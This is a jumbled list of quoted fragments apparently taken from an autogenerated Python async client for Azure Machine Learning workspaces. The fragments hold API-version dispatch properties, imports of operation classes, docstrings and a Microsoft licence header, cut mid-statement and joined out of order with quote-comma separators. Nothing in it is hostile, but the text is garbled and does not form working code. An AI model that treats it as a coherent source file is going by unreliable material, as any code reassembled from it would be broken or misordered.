:class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.QuotasOperations>` \"\"\" api_version = self._get_api_version('quotas') if api_version == '2021-10-01': from", "'2022-05-01': from ..v2022_05_01.aio.operations import UsagesOperations as OperationClass else: raise ValueError(\"API version {} does", ":class:`GetOperationStatusOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.GetOperationStatusOperations>` \"\"\" api_version = self._get_api_version('get_operation_status') if api_version == '1.5.0': from 
..dataset_dataplane.aio.operations import GetOperationStatusOperations", "-------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def spans(self): \"\"\"Instance depends on the API", "'2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspaceConnectionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ModelVersionsOperations as OperationClass elif api_version ==", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatasetContainersOperations as OperationClass else: raise ValueError(\"API", "= self._get_api_version('model_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ModelVersionsOperations as OperationClass elif", "'2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import CodeContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations", "group 'data_version'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_versions(self): \"\"\"Instance depends on", "* 2021-10-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineDeploymentsOperations>` * 2022-02-01-preview: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineDeploymentsOperations>` * 2022-05-01: 
:class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineDeploymentsOperations>` \"\"\" api_version = self._get_api_version('online_deployments')", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def extensive_model(self): \"\"\"Instance depends on the API version: *", "..v2021_10_01.aio.operations import QuotasOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import QuotasOperations", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspace_features(self): \"\"\"Instance depends on the API", "1.5.0: :class:`DataCallOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataCallOperations>` \"\"\" api_version = self._get_api_version('data_call') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import", "on the API version: * 2021-10-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentContainersOperations>` * 2021-10-01-dataplanepreview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentContainersOperations>` * 2022-02-01-preview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentContainersOperations>`", "2022-02-01-preview: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.JobsOperations>` * 2022-05-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.JobsOperations>` \"\"\" api_version = self._get_api_version('jobs') if api_version == '2021-10-01':", "'registry_management_non_workspace'\".format(api_version)) return OperationClass(self._client, 
self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def run(self): \"\"\"Instance depends on the", "operation group 'quotas'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def registry_management_non_workspace(self): \"\"\"Instance depends", "{} does not have operation group 'get_operation_status'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "does not have operation group 'environment_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "VirtualMachineSizesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import VirtualMachineSizesOperations as OperationClass", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'batch_job_endpoint'\".format(api_version))", "# regenerated. 
# -------------------------------------------------------------------------- from typing import Any, Optional, TYPE_CHECKING from azure.mgmt.core import", "Deserializer(self._models_dict(api_version))) @property def workspace_features(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceFeaturesOperations>`", "the API version: * 2021-10-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspacesOperations>` * 2022-01-01-preview: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspacesOperations>` * 2022-05-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspacesOperations>` \"\"\"", "api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import QuotasOperations as OperationClass elif api_version == '2022-05-01':", "Deserializer(self._models_dict(api_version))) @property def async_operations(self): \"\"\"Instance depends on the API version: * v1.0: :class:`AsyncOperationsOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.AsyncOperationsOperations>`", "@property def migration(self): \"\"\"Instance depends on the API version: * 1.0.0: :class:`MigrationOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.MigrationOperations>` \"\"\"", "* 2022-02-01-preview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelContainersOperations>` * 2022-05-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelContainersOperations>` \"\"\" api_version = self._get_api_version('model_containers') if api_version ==", "EnvironmentContainersOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", 
"OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_endpoints(self): \"\"\"Instance depends on the API version:", "to Azure. :type credential: ~azure.core.credentials_async.AsyncTokenCredential :param subscription_id: The ID of the target subscription.", "@property def data_call(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DataCallOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataCallOperations>` \"\"\"", "'2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import VirtualMachineSizesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "@property def jobs(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.JobsOperations>` *", "'batch_job_deployment'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_job_endpoint(self): \"\"\"Instance depends on the", "raise ValueError(\"API version {} does not have operation group 'batch_deployments'\".format(api_version)) return OperationClass(self._client, self._config,", "Deserializer(self._models_dict(api_version))) @property def dataset_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`DatasetContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetContainersOperations>`", "2022-01-01-preview: :class:`Operations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.Operations>` * 2022-05-01: :class:`Operations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.Operations>` \"\"\" api_version = self._get_api_version('operations') if api_version == '2021-10-01':", "else: raise ValueError(\"API version 
{} does not have operation group 'batch_endpoints'\".format(api_version)) return OperationClass(self._client,", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'model_versions'\".format(api_version)) return", "the API version: * 2021-10-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeVersionsOperations>` * 2022-02-01-preview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeVersionsOperations>` *", "operation group 'batch_endpoints'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_job_deployment(self): \"\"\"Instance depends", "api_version = self._get_api_version('data_containers') if api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DataContainersOperations as OperationClass", "\"\"\" api_version = self._get_api_version('dataset_v2') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetV2Operations as", "version: * 2021-10-01: :class:`Operations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.Operations>` * 2022-01-01-preview: :class:`Operations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.Operations>` * 2022-05-01: :class:`Operations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.Operations>` \"\"\" api_version =", "'experiments': 'v1.0', 'extensive_model': '1.0.0', 'get_operation_status': '1.5.0', 'metric': 'v1.0', 'migration': '1.0.0', 'models': '1.0.0', 'registry_management_non_workspace':", "'2021-10-01': from ..v2021_10_01.aio.operations import Operations as OperationClass elif api_version == 
'2022-01-01-preview': from ..v2022_01_01_preview.aio.operations", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def runs(self): \"\"\"Instance depends on the API", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComputeOperations as OperationClass else:", "raise ValueError(\"API version {} does not have operation group 'compute'\".format(api_version)) return OperationClass(self._client, self._config,", "models return models elif api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview import models return models", "= self._get_api_version('data_version') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataVersionOperations as OperationClass else:", "have operation group 'operations'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def private_endpoint_connections(self): \"\"\"Instance", "elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import OnlineDeploymentsOperations as OperationClass elif api_version ==", "'2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspaceFeaturesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "BatchDeploymentsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_v2(self): \"\"\"Instance depends on the API version: *", "@property def virtual_machine_sizes(self): \"\"\"Instance depends on the API version: * 2021-10-01: 
:class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.VirtualMachineSizesOperations>` *", "2021-10-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelVersionsOperations>` * 2022-02-01-preview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelVersionsOperations>` * 2022-05-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelVersionsOperations>` \"\"\" api_version", "{} does not have operation group 'data_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "@property def model_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelVersionsOperations>` *", "API version available on public Azure. 
For production, you should stick to a", ":class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentContainersOperations>` * 2022-02-01-preview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentContainersOperations>` * 2022-05-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentContainersOperations>` \"\"\" api_version = self._get_api_version('component_containers') if api_version", "on the API version: * 2021-10-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelVersionsOperations>` * 2022-02-01-preview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelVersionsOperations>`", "else: raise ValueError(\"API version {} does not have operation group 'data_call'\".format(api_version)) return OperationClass(self._client,", "2021-10-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceFeaturesOperations>` * 2022-01-01-preview: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceFeaturesOperations>` * 2022-05-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceFeaturesOperations>` \"\"\" api_version = self._get_api_version('workspace_features') if", "models elif api_version == 'v1.0': from ..runhistory import models return models elif api_version", "the API version: * 2021-10-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchDeploymentsOperations>` * 2022-02-01-preview: 
:class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchDeploymentsOperations>` * 2022-05-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchDeploymentsOperations>` \"\"\"", "api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import CodeVersionsOperations as OperationClass elif api_version == '2022-05-01':", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComputeOperations as OperationClass else: raise ValueError(\"API version", "WorkspaceConnectionsOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspaceConnectionsOperations as OperationClass", "runs(self): \"\"\"Instance depends on the API version: * v1.0: :class:`RunsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunsOperations>` \"\"\" api_version =", "available on public Azure. For production, you should stick to a particular api-version", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_job_deployment(self): \"\"\"Instance depends on the API", "and/or profile. 
The profile sets a mapping between an operation group and its", "..v2021_10_01.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentVersionsOperations", "not have operation group 'code_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def component_containers(self):", "== '2022-05-01': from ..v2022_05_01.aio.operations import DataVersionsOperations as OperationClass else: raise ValueError(\"API version {}", "'2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobDeploymentOperations as OperationClass else: raise ValueError(\"API version {} does", "== '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import QuotasOperations as OperationClass elif api_version == '2022-05-01': from", "= self._get_api_version('online_deployments') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import OnlineDeploymentsOperations as OperationClass elif", "as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import CodeVersionsOperations as OperationClass elif", "\"\"\" api_version = self._get_api_version('assets') if api_version == '1.0.0': from ..model_dataplane.aio.operations import AssetsOperations as", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def environment_containers(self): \"\"\"Instance depends on the API", "== '2021-10-01': from ..v2021_10_01.aio.operations import CodeVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def 
dataset_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "operations if no Retry-After header is present. \"\"\" DEFAULT_API_VERSION = '2022-05-01' _PROFILE_TAG =", "version: * 2020-09-01-dataplanepreview: :class:`BatchJobDeploymentOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobDeploymentOperations>` \"\"\" api_version = self._get_api_version('batch_job_deployment') if api_version == '2020-09-01-dataplanepreview': from", "..v2020_09_01_dataplanepreview.aio.operations import BatchJobEndpointOperations as OperationClass else: raise ValueError(\"API version {} does not have", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_deployments(self): \"\"\"Instance depends on the API", "have operation group 'data_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_containers(self): \"\"\"Instance", "import MetricOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "api_version: API version to use if no profile is provided, or if missing", "if TYPE_CHECKING: # pylint: disable=unused-import,ungrouped-imports from azure.core.credentials import TokenCredential from azure.core.credentials_async import AsyncTokenCredential", "Will be removed in final version of multiapi azure-core based client \"\"\" pass", "stick to a particular api-version and/or profile. 
The profile sets a mapping between", "api_version = self._get_api_version('batch_endpoints') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import BatchEndpointsOperations as OperationClass", "batch_job_endpoint(self): \"\"\"Instance depends on the API version: * 2020-09-01-dataplanepreview: :class:`BatchJobEndpointOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobEndpointOperations>` \"\"\" api_version =", "models return models elif api_version == 'v1.0': from ..runhistory import models return models", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.JobsOperations>` * 2022-02-01-preview: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.JobsOperations>` *", "on the API version: * 2021-10-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.QuotasOperations>` * 2022-01-01-preview: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.QuotasOperations>` * 2022-05-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.QuotasOperations>`", "raise ValueError(\"API version {} does not have operation group 'model_containers'\".format(api_version)) return OperationClass(self._client, self._config,", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import OnlineEndpointsOperations as OperationClass else:", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'model_containers'\".format(api_version)) return", "on public Azure. 
For production, you should stick to a particular api-version and/or", "self._get_api_version('batch_endpoints') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import BatchEndpointsOperations as OperationClass elif api_version", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def code_containers(self): \"\"\"Instance depends on the API version: *", "..v2022_05_01.aio.operations import DataVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "'data_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_containers(self): \"\"\"Instance depends on the", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def models(self): \"\"\"Instance depends on the API version: * 1.0.0:", ":class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentVersionsOperations>` * 2022-02-01-preview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentVersionsOperations>` * 2022-05-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentVersionsOperations>` \"\"\" api_version =", "AzureMachineLearningWorkspacesConfiguration(credential, subscription_id, **kwargs) self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs) super(AzureMachineLearningWorkspaces, self).__init__( api_version=api_version, profile=profile )", "* 2022-05-01: 
:mod:`v2022_05_01.models<azure.mgmt.machinelearningservices.v2022_05_01.models>` \"\"\" if api_version == '1.5.0': from ..dataset_dataplane import models return", "\"\"\"Instance depends on the API version: * v1.0: :class:`RegistryManagementNonWorkspaceOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.RegistryManagementNonWorkspaceOperations>` \"\"\" api_version = self._get_api_version('registry_management_non_workspace')", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_endpoints(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "API version: * 1.5.0: :class:`DatasetsV1Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetsV1Operations>` \"\"\" api_version = self._get_api_version('datasets_v1') if api_version == '1.5.0':", "2020-09-01-dataplanepreview: :mod:`v2020_09_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.models>` * 2021-10-01: :mod:`v2021_10_01.models<azure.mgmt.machinelearningservices.v2021_10_01.models>` * 2021-10-01-dataplanepreview: :mod:`v2021_10_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.models>` * 2022-01-01-preview: :mod:`v2022_01_01_preview.models<azure.mgmt.machinelearningservices.v2022_01_01_preview.models>` * 2022-02-01-preview:", "'2021-10-01': from ..v2021_10_01.aio.operations import CodeContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations", "as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import UsagesOperations as OperationClass elif", "on the API version: * 2021-10-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceConnectionsOperations>` * 2022-01-01-preview: 
:class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceConnectionsOperations>` * 2022-05-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceConnectionsOperations>`", "operation group 'workspaces'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) async def close(self): await self._client.close()", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_call(self): \"\"\"Instance depends on the API version: *", "* v1.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.DeleteOperations>` \"\"\" api_version = self._get_api_version('delete') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations", "2022-01-01-preview: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-05-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateEndpointConnectionsOperations>` \"\"\" api_version = self._get_api_version('private_endpoint_connections') if api_version == '2021-10-01':", "as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import CodeContainersOperations as OperationClass elif", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatasetContainersOperations as OperationClass else: raise ValueError(\"API version", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'online_deployments'\".format(api_version))", ":class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelVersionsOperations>` * 
2022-02-01-preview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelVersionsOperations>` * 2022-05-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelVersionsOperations>` \"\"\" api_version = self._get_api_version('model_versions') if api_version", "* 2022-02-01-preview: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineDeploymentsOperations>` * 2022-05-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineDeploymentsOperations>` \"\"\" api_version = self._get_api_version('online_deployments') if api_version ==", "== '2021-10-01': from ..v2021_10_01.aio.operations import ModelVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from", "else: raise ValueError(\"API version {} does not have operation group 'run'\".format(api_version)) return OperationClass(self._client,", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import OnlineEndpointsOperations as OperationClass else: raise ValueError(\"API version", "@property def workspace_features(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceFeaturesOperations>` *", "== '1.5.0': from ..dataset_dataplane.aio.operations import DatasetV2Operations as OperationClass else: raise ValueError(\"API version {}", "OnlineEndpointsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import OnlineEndpointsOperations as OperationClass", "= self._get_api_version('experiments') if api_version == 'v1.0': from ..runhistory.aio.operations import ExperimentsOperations as OperationClass else:", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import 
ComponentVersionsOperations as OperationClass else:", "the API version: * 1.5.0: :class:`DatasetV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetV2Operations>` \"\"\" api_version = self._get_api_version('dataset_v2') if api_version ==", "..registry_discovery.aio.operations import RegistryManagementNonWorkspaceOperations as OperationClass else: raise ValueError(\"API version {} does not have", "code is # regenerated. # -------------------------------------------------------------------------- from typing import Any, Optional, TYPE_CHECKING from", "incorrect behavior and will be lost if the code is # regenerated. #", "Azure Machine Learning Workspace resources. This ready contains multiple API versions, to help", "self._get_api_version('environment_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def component_containers(self): \"\"\"Instance depends on the API version:", "'dataset_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_controller_v2(self): \"\"\"Instance depends on the", "polling_interval: Default waiting time between two polls for LRO operations if no Retry-After", "import GetOperationStatusOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "models elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview import models return models elif api_version", ":class:`DatasetVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetVersionsOperations>` \"\"\" api_version = self._get_api_version('dataset_versions') if api_version == 
'2021-10-01': from ..v2021_10_01.aio.operations import DatasetVersionsOperations", "'dataset_v2'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_versions(self): \"\"\"Instance depends on the", "class to support current implemetation of MultiApiClientMixin.\" Will be removed in final version", "import AsyncOperationsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "else: raise ValueError(\"API version {} does not have operation group 'data_containers'\".format(api_version)) return OperationClass(self._client,", "of the target subscription. :type subscription_id: str :param api_version: API version to use", ") def __init__( self, credential: \"AsyncTokenCredential\", subscription_id: str, api_version: Optional[str] = None, base_url:", "elif api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview import models return models elif api_version ==", "the target subscription. 
:type subscription_id: str :param api_version: API version to use if", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatastoresOperations as OperationClass elif api_version == '2022-02-01-preview':", "AsyncTokenCredential class _SDKClient(object): def __init__(self, *args, **kwargs): \"\"\"This is a fake class to", "ValueError(\"API version {} does not have operation group 'run_artifacts'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "1.5.0: :mod:`dataset_dataplane.models<azure.mgmt.machinelearningservices.dataset_dataplane.models>` * 1.0.0: :mod:`model_dataplane.models<azure.mgmt.machinelearningservices.model_dataplane.models>` * v1.0: :mod:`registry_discovery.models<azure.mgmt.machinelearningservices.registry_discovery.models>` * v1.0: :mod:`runhistory.models<azure.mgmt.machinelearningservices.runhistory.models>` * 2020-09-01-dataplanepreview:", "== '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ComponentContainersOperations as OperationClass elif api_version == '2022-05-01': from", "on the API version: * 2021-10-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchEndpointsOperations>` * 2022-02-01-preview: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchEndpointsOperations>` * 2022-05-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchEndpointsOperations>`", "dataset_v2(self): \"\"\"Instance depends on the API version: * 1.5.0: 